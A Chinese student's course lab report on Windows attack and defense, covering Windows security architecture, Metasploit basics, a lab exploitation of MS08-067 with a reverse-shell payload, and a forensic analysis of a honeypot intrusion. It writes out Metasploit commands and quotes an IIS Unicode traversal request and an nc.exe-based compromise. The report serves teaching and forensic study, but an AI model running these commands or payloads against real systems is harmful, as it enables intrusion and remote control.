20212808 2021-2022-2 《網路攻防實踐》實踐六報告
20212808 2021-2022-2 《網路攻防實踐》實踐六報告
1.知識點梳理與總結
1.1 實驗內容
一、動手實踐Metasploit windows attacker
任務:使用metasploit軟體進行windows遠端滲透統計實驗
具體任務內容:使用windows Attacker/BT4攻擊機嘗試對windows Metasploitable靶機上的MS08-067漏洞進行遠端滲透攻擊,獲取目標主機的訪問權
二、取證分析實踐:解碼一次成功的NT系統破解攻擊。
來自212.116.251.162的攻擊者成功攻陷了一臺由rfp部署的蜜罐主機172.16.1.106,(主機名為lab.wiretrip.net),要求提取並分析攻擊的全部過程。
攻擊者使用了什麼破解工具進行攻擊
攻擊者如何使用這個破解工具進入並控制了系統
攻擊者獲得系統訪問許可權後做了什麼
我們如何防止這樣的攻擊
你覺得攻擊者是否警覺了他的目標是一臺蜜罐主機?如果是,為什麼?
1.2 實驗原理:
1. Windows作業系統基本框架概述
Windows作業系統核心的基本模組
Windows執行體: 即Windows核心核心檔案ntoskrnl.exe的上層介面, 包含基本的作業系統核心服務
Windows核心體: 即Windows核心核心檔案moskrnl.exe中酌數實現與硬體體系結構支援程式碼,實現底層的作業系統功能
裝置驅動程式: 包括將使用者I/O操作對映為特定硬體裝置I/O請求的硬體裝置驅動程式, 以及檔案系統與網路裝置驅動程式
硬體抽象層: 即hal.dll檔案, 是用於遮蔽Windows 核心與平臺硬體差異性的底層程式碼。
Windows視窗與圖形介面介面核心實現程式碼: 即win32k.sys檔案
** Windows作業系統在使用者態的程式碼模組則包括如下:**
系統支援程序:Windows開機自動啟動的系統內建服務程序,如用於登入認證的logon程序
環境子系統服務程序:為執行環境提供支援的服務程序
服務程序:通過Windows的服務管理機制所啟動的一系列系統及網路服務
使用者應用軟體:在使用者態執行的各類使用者應用軟體
核心子系統DLL:很多dll動態連線庫檔案,作為使用者態服務程序與應用軟體和作業系統核心的互動介面
Windows作業系統核心中實現瞭如下的核心機制:
windows程序和執行緒管理機制:程序可以看作是可執行程式執行的容器,Windows執行緒作為指令執行的具體載體
Windows記憶體管理機制:Windows的虛擬記憶體空間分為系統核心記憶體區間與使用者記憶體區間兩部分
Windows檔案管理機制:NTFS檔案系統從ACL訪問控制列表來保證檔案資源讀/寫的安全性,較FAT更加安全,此外具有更高的效能、可靠性和磁碟利用效率。Windows上的可執行檔案採用PE(Portable Executable)格式
Windows登錄檔管理機制:登錄檔被稱為Windows作業系統的核心,Windows系統登錄檔存放了關於計算機硬體的配置資訊、系統和應用軟體的初始化資訊、應用軟體和文件檔案的關聯關係、硬體裝置的說明以及各種狀態資訊和資料,包括Windows操作時不斷引用的資訊。在 Windows系統配置和控制方面承擔著關鍵角色。
Windows的網路機制:1.各種網絡卡硬體的裝置驅動程式,一般由第三方硬體廠商開發並提供,處於OSl參考模型的物理層。2.NDIS (Network Driver Interface Specification)庫及miniport驅動程式,位千OSI鏈路層,為各種不同的網絡卡介面卡驅動程式和TDI傳輸層之間構建了一個封裝介面3.TDI,傳輸層,將網路請求格式化成IRP,以及申請網路地址和資料通訊4.網路API DLL及TDI客戶端,會話層和表示層,獨立於具體協議提供網路互動和實現方式5.網路應用程式與服務程序,對應OSI應用層,通常使用各類網路API DLL來實現網路互動與通訊功能。
2. Windows作業系統的安全體系結構與機制
windows安全體系結構:
windows的安全體系結構基於引用監控器這一經典的安全模型。
其最核心的是位於核心的SRM安全引用監視器,以及位於使用者態的LSASS安全服務,並與winlogin、eventlog等相關服務一起實現身份認證機制
windows身份認證機制與授權、訪問控制機制
windows下的身份通過一個唯一的SID安全符進行標識
windows為每個使用者和計算機設定賬戶進行管理,並引入使用者組來簡化使用者管理
windows的使用者賬戶的口令通過加密處理之後被保存於SAM或者活動目錄AD中。
winlogon、GINA、LSASS服務通過協作來完成本地身份認證的過程。
在程式程序控制塊中包含一個安全訪問令牌,繼承了啟動程序的賬戶的所有訪問令牌。
windows下所有需要保護的內容都被抽象成物件,每個物件會關聯一個SD安全描述符。
windows安全審計機制和其他安全機制
LSAS服務將儲存審計策略,在物件安全描述符中的SACL列表中進行儲存
再次之外,安全中心還具有防火牆、補丁自動更新、病毒防護機制。
安全中心之外還有,IPSec加密與驗證機制、EFS加密檔案系統、windows檔案保護機制等。
3.Windows遠端安全攻防技術
windows遠端安全攻防的分類
遠端口令猜測與破解攻擊
攻擊windows網路服務
攻擊windows客戶端及使用者
Metasploit基礎教程
1. Metasploit的相關模組、介紹
Exploits 漏洞模組,使用“有效載荷(payloads)”的模組
Payloads 有效載荷,由遠端執行的程式碼組成
Encoders 編碼器,確保“有效載荷”到達目的地
Nops 空指令模組,保持“有效載荷”大小一致
2. Metasploit常用命令介紹
show exploit 列出metasploit框架中的所有滲透攻擊模組。
show payloads 列出metasploit框架中的所有攻擊載荷。
show auxiliary 列出metasploit框架中的所有輔助攻擊模組。
search name 查詢metasploit框架中的所有滲透攻擊和其他模組。
info 展示出制定滲透攻擊或模組的相關資訊。
use name 裝載一個滲透攻擊或者模組。
LHOST 目標主機連結的IP地址。
RHOST 遠端主機或者目標主機。
set function 設定特定的配置引數。
run scriptname 執行meterpreter指令碼,在scripts/meterpreter目錄下可檢視到所有指令碼名。
use priv 載入特權提升擴充套件模組,來擴充套件meterpreter庫。
use incognito 載入inconito功能(用來盜取目標主機的令牌或是假冒使用者)
getsystem 通過各種攻擊向量來提升到系統使用者許可權。
shell 以所有可用令牌來執行一個互動的shell。
3. windows遠端攻擊方法的防禦措施
口令猜測和破解:關閉不需要的埠、配置主機防火牆來限制上述埠、利用網路防火牆來限制這些服務的訪問和禁用存在缺陷的NTLM
遠端滲透攻擊防範措施:從軟體設計上儘量減少滲透攻擊、儘可能快的更新安全補丁、為零日漏洞配置緩解攻擊配置、利用安全清單外掛來固化網路、通過漏洞掃描軟體來標識存在的漏洞。
4。Windows本地安全攻防技術
windows本地特權提升
本地提權的常見三種手段:溢位提權、windows錯誤系統配置、計劃任務提權。
防範措施:及時打補丁、及時跟進廠家的安全警告
windows敏感資訊竊取
包括windows系統口令字密文提取技術、windows系統口令字破解技術、使用者敏感資訊竊取等手段
防範措施:使用安全度高、能抵擋破解的口令
windows消滅蹤跡
主要手段包括、關閉審計功能、清理事件日誌。
防範措施:實現配置好系統審計和網路服務審計功能,並將日誌傳輸到安全伺服器中。
遠端控制與後門
主要手段包括向受控主機中植入第三方的遠端控制與後門程式,主要包含命令列遠端控制程式和圖形化遠端控制程式。
防範措施:採用一些後門檢測軟體來嘗試發現攻擊者隱藏的後門程式。
2.實踐過程
2.1 動手實踐Metasploit windows attacker
- 任務:使用metasploit軟體進行windows遠端滲透統計實驗
- 具體任務內容:使用windows Attacker/BT4攻擊機嘗試對windows Metasploitable靶機上的MS08-067漏洞進行遠端滲透攻擊,獲取目標主機的訪問權
- 檢視下IP地址
kali 192.168.200.2
windowsXP Attacker 192.168.200.3
SEEDUbuntu 192.168.200.4
win2k 192.168.200.10 - 開啟kali的metasploit
- 搜尋ms08_067漏洞search ms08_067,會顯示出找到的滲透模組,這是針對這個漏洞的滲透攻擊模組
- 使用命令use exploit/windows/smb/ms08_067_netapi使用該模組,
使用命令show options檢視此漏洞需要的設定
使用命令show payloads檢視此漏洞的載荷
選擇第三個載荷進行攻擊
- 通過命令set payload generic/shell_reverse_tcp設定攻擊的載荷
通過命令set LHOST 192.168.200.2設定本機
通過命令set RHOST 192.168.200.10設定攻擊目標
- 通過exploit發起攻擊
回車可以進入受害靶機的shell輸入命令列ipconfig檢視靶機的IP攻擊成功
2.2 取證分析實踐:解碼一次成功的NT系統破解攻擊。
來自212.116.251.162的攻擊者成功攻陷了一臺由rfp部署的蜜罐主機172.16.1.106,(主機名為lab.wiretrip.net),要求提取並分析攻擊的全部過程。
攻擊者使用了什麼破解工具進行攻擊
攻擊者如何使用這個破解工具進入並控制了系統
攻擊者獲得系統訪問許可權後做了什麼
我們如何防止這樣的攻擊
你覺得攻擊者是否警覺了他的目標是一臺蜜罐主機?如果是,為什麼
- 用本機的wireshark開啟雲班課老師上傳的[email protected]檔案
編號為117的這一行/guest/default.asp/..%C0%AF../..%C0%AF../..%C0%AF../boot.ini
其中boot.ini是NT系統的啟動檔案,..%c0af..是"/"的Unicode編碼。這是IIS存在的一個漏洞。說明攻擊者通過IIS Unicode漏洞瞭解了被攻擊主機作業系統的一些基本情況
再往下,可以看到攻擊者試圖向伺服器獲取一個msadcs.dll檔案
攻擊者利用這個dll存在RDS漏洞,輸入了個數據查詢語句進行SQL注入攻擊。根據ADM!ROX..以及那個mdb。我們可以通過谷歌查詢到它是通過rain forest puppy編寫的msadc(2).pl滲透攻擊程式碼發起的。
然後攻擊者就成功進入了系統。往下拉,可以看到到下圖所示位置,發生了變化。攻擊者建立了一個ftp連線。輸入了使用者名稱密碼,下載了幾個檔案。
然後攻擊者連線6969埠,獲得了訪問許可權
從1361編號開始,攻擊機發起了多次SQL注入攻擊,通過修改使用者名稱和口令的方式完成了利用FTP進行網路攻擊工具軟體nc.exe的注入操作。
然後在編號2339,右鍵追蹤http流,我們可以看到,根據add,他應該是想提升許可權
攻擊者使用了什麼破解工具進行攻擊?
口令破解工具和nc.exe來實現對目標主機的攻擊。Nc.exe:完成遠端主機連線等工作。
攻擊者如何使用這個破解工具進入並控制了系統?
Nc.exe:完成遠端主機連線後,利用telnet操作實現對作業系統的控制。
當攻擊者獲得系統的訪問權後做了什麼?
對目標主機的檔案系統進行了嗅探。
嘗試在根目錄下建立rdisk,但是沒有成功。
並試圖通過刪除SAM資料庫中的資料(拷貝和刪除har.txt)和將自己加到管理員組中的方式來實現提升自己訪問許可權的目的。
還試圖在其它埠(6969)上執行nc。
我們如何防止這樣的攻擊?
到微軟官方網站下載針對上述漏洞的補丁
你覺得攻擊者是否警覺了他的目標是一臺蜜罐主機?如果是,為什麼?
攻擊者應該意識到了其攻擊的是蜜罐主機
2.3 團隊對抗實踐:windows系統遠端滲透攻擊和分析。
攻方使用metasploit選擇漏洞進行攻擊,獲得控制權。(要求寫出攻擊方的同學資訊、使用漏洞、相關IP地址等)
防守方使用wireshark監聽獲得的網路資料包,分析攻擊過程,獲取相關資訊。
- 以下都是重複的實踐1的步驟,過程我就不再截圖展示了,就直接顯示執行的命令吧,如下:
(1)開啟kali的metasploit
(2)search ms08_067,搜尋ms08_067漏洞
(3)use exploit/windows/smb/ms08_067_netapi,進入該漏洞模組的使用
(4)show payloads,顯示出有效的攻擊載荷
(5)set PAYLOAD 3,設定攻擊有效載荷
(6)show options,顯示我們需要在攻擊前需要設定的資料
(7)按照靶機RHOST,攻擊機LHOST的原則配置IP
set RHOST 192.168.200.10
set LHOST 192.168.200.2
(8)show options,再次檢視payload狀態
(9)使用攻擊命令exploit - 開啟wireshark進行監聽,可以看出攻擊者ip地址192.168.200.2,埠1044,靶機ip地址192.168.200.10,埠4444等資訊
攻擊的發起時間。是從第一個ARP請求開始,即圖中的序號17
27/30/34三個資料包是tcp三次握手包,建立連線後,從下圖中我們發現攻擊機向靶機發了許多SMB協議包
MS08-067漏洞是通過MSRPC over SMB通道呼叫Server服務程式中的NetPathCanonicalize函式時觸發的。所以據此可以推斷出,是利用這個漏洞攻擊的
3.學習中遇到的問題及解決
分析過程較難,多百度
4.實踐總結
整體不難,分析內容較難,不夠清晰,還是多學習多實踐。